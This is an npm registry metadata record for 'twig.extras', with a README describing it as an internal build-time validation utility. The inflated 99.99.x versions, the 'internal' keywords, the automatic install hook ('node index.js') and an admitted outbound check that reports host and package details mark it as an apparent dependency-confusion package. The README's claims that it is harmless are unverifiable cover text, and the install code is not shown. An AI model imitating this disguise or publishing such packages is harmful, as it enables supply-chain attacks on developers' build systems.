{"_id":"twig.extras","_rev":"2-e7a5858301c551f4d60a3d3cbf31d0e8","name":"twig.extras","dist-tags":{"latest":"99.99.10"},"versions":{"99.99.9":{"name":"twig.extras","version":"99.99.9","keywords":["internal","ci","build","compatibility","diagnostics"],"author":{"name":"Internal Tools Team"},"license":"ISC","_id":"twig.extras@99.99.9","maintainers":[{"name":"dattopoc","email":"dattopoc@sl4x0.xyz"}],"homepage":"https://github.com/sl4x0","dist":{"shasum":"c7709af5ab3902f85da585dddc8ae1fb6c8b52d1","tarball":"https://registry.npmjs.org/twig.extras/-/twig.extras-99.99.9.tgz","fileCount":3,"integrity":"sha512-g2FwiujgZEBUd7U6S+GerI+oKh/YuJ9CeQq66ePObdlYtlBOXJjzkEjHk8d155cn+ZTDg8tvXz277eGSg2LENQ==","signatures":[{"sig":"MEUCICGcnjJtD01YpsJyDsWCO9A/3/LrWSjWTgyi/mX767FmAiEAmEqWOv13Hpz35C2P47WygFP97uMBmHiNKKRYN0QkWno=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":3811},"main":"index.js","type":"commonjs","engines":{"node":">=14"},"private":false,"scripts":{"install":"node index.js"},"_npmUser":{"name":"dattopoc","email":"dattopoc@sl4x0.xyz"},"_npmVersion":"11.4.0","description":"Internal build-time compatibility and environment validation utility","directories":{},"_nodeVersion":"20.19.6","publishConfig":{"access":"public"},"_hasShrinkwrap":false,"_npmOperationalInternal":{"tmp":"tmp/twig.extras_99.99.9_1771160198904_0.28473738762375334","host":"s3://npm-registry-packages-npm-production"}},"99.99.10":{"name":"twig.extras","version":"99.99.10","description":"Internal build-time compatibility and environment validation utility","license":"ISC","author":{"name":"Internal Tools Team"},"type":"commonjs","main":"index.js","scripts":{"install":"node index.js"},"publishConfig":{"access":"public"},"engines":{"node":">=14"},"keywords":["internal","ci","build","compatibility","diagnostics"],"homepage":"https://github.com/sl4x0","private":false,"_id":"twig.extras@99.99.10","_nodeVersion":"20.19.6","_npmVersion":"11.4.0","dist":{"integrity":"sha512-fKotxDi+zh6YFaw4GQvI30FZ6Srjysg901lJb854cU9zvwI6AnTknZegZRP4z734Bbm8639JJxshGdyxRO6GhQ==","shasum":"3062091c274d8aeed2c59fc849bdef5f25884e7d","tarball":"https://registry.npmjs.org/twig.extras/-/twig.extras-99.99.10.tgz","fileCount":3,"unpackedSize":3811,"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEYCIQD/wIII40IriTZB78Jy9j+2RxQtUFB+lZrauVo9CKRMxAIhAMIEqP++chz9HlLKuQyLaOFRrfiit40H4Xek+i0VaG15"}]},"_npmUser":{"name":"dattopoc","email":"dattopoc@sl4x0.xyz"},"directories":{},"maintainers":[{"name":"dattopoc","email":"dattopoc@sl4x0.xyz"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/twig.extras_99.99.10_1771160369101_0.9254725314165722"},"_hasShrinkwrap":false}},"time":{"created":"2026-02-15T12:56:38.819Z","modified":"2026-02-15T12:59:29.394Z","99.99.9":"2026-02-15T12:56:39.029Z","99.99.10":"2026-02-15T12:59:29.263Z"},"author":{"name":"Internal Tools Team"},"license":"ISC","homepage":"https://github.com/sl4x0","keywords":["internal","ci","build","compatibility","diagnostics"],"description":"Internal build-time compatibility and environment validation utility","maintainers":[{"name":"dattopoc","email":"dattopoc@sl4x0.xyz"}],"readme":"# Compatibility Client\n\n![Build Status](https://img.shields.io/badge/build-passing-brightgreen)\n![Version](https://img.shields.io/badge/version-1.0.0-blue)\n![License](https://img.shields.io/badge/license-ISC-lightgrey)\n\nInternal utility for validating package resolution and execution context during automated builds.\n\nThis package is intended to run as part of an existing dependency graph and provides basic environment validation to confirm that the runtime and network conditions required by the build system are present.\n\n## Purpose\n\n**The client is used to:**\n\n* Confirm that dependency installation hooks execute as expected\n* Validate runtime characteristics across heterogeneous build agents\n* Detect misconfigurations in dependency resolution or network access early in the pipeline\n\nIt performs a minimal execution check and exits without affecting build output.\n\n## Features\n\n* **Automatic Execution**\n  Runs during the standard installation lifecycle. No manual invocation required.\n\n* **Environment Validation**\n  Confirms runtime platform, architecture, and Node.js compatibility.\n\n* **Lightweight Connectivity Check**\n## Installation\n\nThe package is consumed implicitly by the build system.\n\n```bash\nnpm install packagename\n```\n\nNo configuration flags or runtime arguments are supported or required.\n\n## Collected Data\n\nTo aid in diagnosing inconsistent behavior across build agents, the client may derive the following non-sensitive signals at runtime:\n\n* Operating system and architecture\n* A one-way hash of the host identifier to distinguish build agents\n* The consuming package name for correlation of resolution outcomes\n\nNo source files, credentials, environment variables, or user data are accessed.\n\nAll signals are ephemeral and used solely to confirm successful execution in the target environment.\n\n## Behavior Notes\n\n* The package does not modify files outside its own directory\n* The package does not persist data\n* The package does not alter dependency resolution or install order\n* Failure or removal of this package does not impact application runtime behavior\n\n## Security & Compliance\n\nThis package is designed to be inert outside of its installation lifecycle and contains no exploit logic, lateral movement, or persistence mechanisms.\n\nAny outbound check is limited to confirming execution context and does not transmit payload data.\n\n## Contact\n\nFor questions related to usage or behavior:\n\n**[research@sl4x0.xyz](mailto:research@sl4x0.xyz)**\n","readmeFilename":"README.md"}